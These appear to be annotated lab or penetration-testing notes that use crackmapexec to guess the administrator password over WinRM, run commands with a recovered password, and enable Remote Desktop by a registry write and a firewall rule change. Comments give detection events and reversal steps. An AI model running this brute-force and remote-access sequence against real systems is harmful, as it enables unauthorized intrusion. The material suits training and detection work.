crackmapexec
// WinRM (Windows Remote Management) listens on port 5985 (HTTP); example port-scan output:
// PORT STATE SERVICE
// 5985/tcp open wsman
# Password guessing over WinRM: try each entry of top100.txt against the
# "administrator" account. "ip" is a placeholder for the target address and
# -d names the domain to authenticate against.
# Detection: each wrong guess is a failed network logon on the target
# (Security event 4625), so a burst of these from one source against one
# account is a reliable alert condition; repeated failures can also trip
# account lockout where a lockout policy applies.
crackmapexec winrm ip -d local -u administrator -p top100.txt
# Confirm that the recovered credential gives command execution: -x runs the
# quoted command on the target and "whoami" reports the resulting identity.
# "-d ." presumably selects the local machine account rather than a domain
# account (confirm against the tool's help).
# Note: a password passed with -p is kept in shell history and is visible in
# the process list on the machine running the tool.
crackmapexec winrm -d . -u Administrator -p 'badminton' -x "whoami" 10.129.245.141
# Set fDenyTSConnections to 0 under the Terminal Server key, which allows
# incoming Remote Desktop connections (/f overwrites without prompting).
# Detection: this registry write is visible to registry auditing (Sysmon
# event 13, or Security event 4657 when object auditing is enabled on the key).
# The change persists until the value is set back to 1.
crackmapexec winrm -d . -u Administrator -p 'badminton' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' 10.129.81.200
# Enable the built-in "remote desktop" firewall rule group so that the RDP
# listener is reachable through Windows Firewall.
# Detection: rule changes are recorded in the Windows Firewall with Advanced
# Security event log; an unexpected change to this rule group on a server
# deserves review. The rules stay enabled until switched off again.
crackmapexec winrm -d . -u Administrator -p 'badminton' -x 'netsh advfirewall firewall set rule group="remote desktop" new enable=yes' 10.129.81.200
rem The same two changes as standalone Windows commands, run in an elevated
rem prompt on the host itself.
rem Allow incoming Remote Desktop connections (fDenyTSConnections = 0).
rem Setting the value back to 1 reverses this.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
rem Enable the "remote desktop" firewall rule group; "new enable=no" on the
rem same rule group reverses this.
netsh advfirewall firewall set rule group="remote desktop" new enable=yes